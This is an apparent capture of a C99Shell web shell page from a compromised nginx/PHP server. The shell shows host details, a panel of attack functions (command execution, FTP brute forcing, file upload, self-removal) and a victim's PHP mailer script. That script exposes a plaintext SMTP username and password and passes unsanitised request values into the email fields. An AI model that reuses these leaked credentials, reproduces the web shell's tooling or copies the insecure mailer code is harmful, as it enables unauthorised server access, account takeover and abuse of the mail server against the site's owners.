!C99Shell v. 2.0 [PHP 7 Update] [25.02.2019]!

Software: nginx/1.23.4. PHP/5.6.40-65+ubuntu20.04.1+deb.sury.org+1 

uname -a: Linux foro-restaurado-2 5.15.0-1040-oracle #46-Ubuntu SMP Fri Jul 14 21:47:21 UTC 2023
aarch64
 

uid=33(www-data) gid=33(www-data) groups=33(www-data) 

Safe-mode: OFF (not secure)

/home/wwwroot/frames/   drwxrwxr-x
Free 83.3 GB of 96.73 GB (86.12%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     mailing.php (1.81 KB)      -rw-rw-r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php

require_once './classes/class.phpmailer.php';
require_once 
'./classes/class.smtp.php';



echo 
chr(10)."el parametro 1 es {$_REQUEST['titulo']}".chr(10);
echo 
chr(10)."el parametro 2 es {$_REQUEST['destinatario']}".chr(10);    
usleep(5000000);
$mail=new PHPMailer();

$mail->IsSMTP();
$mail->SMTPAuth   true;                  // enable SMTP authentication
$mail->SMTPSecure "ssl";                 // sets the prefix to the servier
$mail->Host       "216.239.59.109";      // sets GMAIL as the SMTP server
$mail->Port       465;                   // set the SMTP port 

$mail->Username   "gabriel.perezmartinez";  // GMAIL username
$mail->Password 'ilvm2rg2';         // GMAIL password

$mail->From       "[email protected]";
$mail->FromName   "administrador http://papyre.co.cc";
$mail->Subject    "conversion del libro  {$_REQUEST['titulo']} finalizada.";
$mail->Body       "La conversion del libro  {$_REQUEST['titulo']}, ha finalizado. ya puedes disponer de el en formato FB2 en la pagina http://papyre.co.cc


saludos:
administrador de http://papyre.co.cc"
;      //HTML Body
$mail->AltBody    "La conversion del libro  {$_REQUEST['titulo']}, ha finalizado. ya puedes disponer de el en formato FB2 en la pagina http://papyre.co.cc


saludos:
administrador de http://papyre.co.cc"
//Text Body

$mail->WordWrap   50// set word wrap

$mail->AddAddress($_REQUEST['destinatario']);
//$mail->AddReplyTo("[email protected]","");
//$mail->AddAttachment($_REQUEST['titulo']);             // attachment
//$mail->AddAttachment("/path/to/image.jpg", "new.jpg"); // attachment
$mail->ConfirmReadingTo "[email protected]";
$mail->SMTPDebug =  true;

$mail->IsHTML(true); // send as HTML

if(!$mail->Send()) {
  echo 
"Mailer Error: " $mail->ErrorInfo;
} else {
  echo 
"Message has been sent";
}



?>

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ Read-Only ]

:: Make Dir ::
 
[ Read-Only ]
:: Make File ::
 
[ Read-Only ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.0 [PHP 7 Update] [25.02.2019] maintained by HackingTool | HackingTool | Generation time: 0.0043 ]--